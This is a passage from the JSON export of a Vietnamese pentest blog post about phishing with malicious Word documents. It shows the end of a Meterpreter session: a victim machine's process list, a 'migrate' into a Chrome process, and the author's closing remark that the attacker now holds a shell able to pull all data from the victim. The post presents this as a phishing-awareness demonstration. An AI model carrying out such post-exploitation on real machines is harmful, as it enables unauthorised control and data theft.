2692<\/span>\u00a0\u00a0<\/span>4016<\/span>\u00a0\u00a0<\/span>chrome<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>CL01<\/span>–<\/span>W7<\/span>\\<\/span>user1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Program <\/span>Files<\/span>\\<\/span>Google<\/span>\\<\/span>Chrome<\/span>\\<\/span>Application<\/span>\\<\/span>chrome<\/span>.<\/span>exe<\/span><\/div>\n
2804<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>SearchIndexer<\/span>.<\/span>exe\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>SearchIndexer<\/span>.<\/span>exe<\/span><\/div>\n
2896<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>wmpnetwk<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>NETWORK <\/span>SERVICE<\/span>\u00a0\u00a0<\/span>C<\/span>:<\/span>\\<\/span>Program <\/span>Files<\/span>\\<\/span>Windows <\/span>Media <\/span>Player<\/span>\\<\/span>wmpnetwk<\/span>.<\/span>exe<\/span><\/div>\n
3200<\/span>\u00a0\u00a0<\/span>628<\/span>\u00a0\u00a0 <\/span>WmiPrvSE<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>system32<\/span>\\<\/span>wbem<\/span>\\<\/span>wmiprvse<\/span>.<\/span>exe<\/span><\/div>\n
3656<\/span>\u00a0\u00a0<\/span>512<\/span>\u00a0\u00a0 <\/span>svchost<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>x86<\/span>\u00a0\u00a0 <\/span>0<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>NT <\/span>AUTHORITY<\/span>\\<\/span>SYSTEM<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Windows<\/span>\\<\/span>System32<\/span>\\<\/span>svchost<\/span>.<\/span>exe<\/span><\/div>\n
4016<\/span>\u00a0\u00a0<\/span>2104<\/span>\u00a0\u00a0<\/span>chrome<\/span>.<\/span>exe\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>x86<\/span>\u00a0\u00a0 <\/span>1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>CL01<\/span>–<\/span>W7<\/span>\\<\/span>user1<\/span>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span>C<\/span>:<\/span>\\<\/span>Program <\/span>Files<\/span>\\<\/span>Google<\/span>\\<\/span>Chrome<\/span>\\<\/span>Application<\/span>\\<\/span>chrome<\/span>.<\/span>exe<\/span><\/div>\n
<\/div>\n
<\/div>\n
meterpreter<\/span> ><\/span> migrate<\/span> 2104<\/span><\/div>\n
<\/div>\n
[<\/span>*<\/span>]<\/span> Migrating <\/span>from<\/span> 1552<\/span> to<\/span> 2104…<\/span><\/div>\n
[<\/span>*<\/span>]<\/span> Migration <\/span>completed <\/span>successfully<\/span>.<\/span><\/div>\n
meterpreter<\/span> ><\/span><\/div>\n
<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

L\u00fac n\u00e0o Word tr\u00ean m\u00e1y n\u1ea1n nh\u1eadn \u00a0t\u1ef1 \u0111\u1ed9ng t\u1eaft \u0111i v\u00e0 tr\u00ean m\u00e1y t\u00ednh c\u1ee7a Attacker \u0111\u00e3 c\u00f3 meterpreter shell cho ph\u00e9p khai th\u00e1c t\u1ea5t c\u1ea3 th\u00f4ng tin tr\u00ean m\u00e1y n\u1ea1n nh\u00e2n. Qua b\u00e0i vi\u1ebft n\u00e0y c\u00e1c b\u1ea1n \u0111\u00e3 th\u1ea5y \u0111\u01b0\u1ee3c s\u1ef1 nguy hi\u1ec3m li\u00ean quan \u0111\u1ebfn vi\u1ec7c t\u1ea5n c\u00f4ng phishing c\u0169ng nh\u01b0 s\u1ef1 nguy hi\u1ec3m c\u1ee7a nh\u1eefng files t\u00e0i li\u1ec7u v\u0103n b\u1ea3n s\u1eed d\u1ee5ng h\u00e0ng ng\u00e0y.<\/p>\n","protected":false},"excerpt":{"rendered":"

Nh\u01b0 ch\u00fang ta \u0111\u00e3 bi\u1ebft phishing l\u00e0 h\u00ecnh th\u1ee9c g\u1eedi nh\u1eefng email c\u00f3 n\u00f4i dung l\u1eeba \u0111\u1ea3o \u0111\u1ebfn ng\u01b0\u1eddi d\u00f9ng trong h\u1ec7 th\u1ed1ng. Th\u1ef1c t\u1ebf cho th\u1ea5y r\u1eb1ng vi\u1ec7c t\u1ea5n c\u00f4ng v\u00e0o c\u00e1c h\u1ec7 th\u1ed1ng…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-308","post","type-post","status-publish","format-standard","hentry","category-pentest"],"_links":{"self":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/comments?post=308"}],"version-history":[{"count":0,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/308\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/media?parent=308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/categories?post=308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/tags?post=308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}